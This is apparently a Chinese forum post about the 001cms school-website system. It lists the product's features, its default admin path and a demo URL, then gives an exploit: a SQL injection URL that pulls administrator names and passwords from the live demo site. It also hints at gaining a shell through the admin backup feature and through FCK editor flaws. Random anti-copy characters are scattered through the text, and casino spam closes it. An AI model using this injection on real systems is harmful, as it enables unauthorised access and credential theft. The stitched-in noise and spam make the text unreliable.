4.视频图片管理:一级分类,动态添加视频或者图片等信息
0 M; g0 ?  m& ]3 C+ W3 {" h3 T5.留言管理:对留言,修改,删除、回复等管理
% K: R. t, S8 l! I8 N6.校友频道:包括校友资料excel导出、管理等功能
% W5 o( }8 G, e5 [& c4 |" X7.友情链接管理:二级分类，能建立不同种类的友情链接显示在首页
默认后台:admin/login.asp
官方演示:http://demo.001cms.net
  r+ i1 `3 t5 z源码下载地址:http://down.chinaz.com/soft/30187.htm
EXP:
union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
9 g  ?3 O' P: z测试:http://demo.001cms.net/shownews.asp?type=新闻动态&stype=校务公开&id=484 union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
  L4 e- S# X  G9 y; a0 ]/ |getshell:后台有备份，你懂的
另:FCK编辑器有几处可利用.大家自己行挖掘,由于相关内容较多，我在这里就不说了。
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------

casino slots
online casino canada
new online casino
slot machines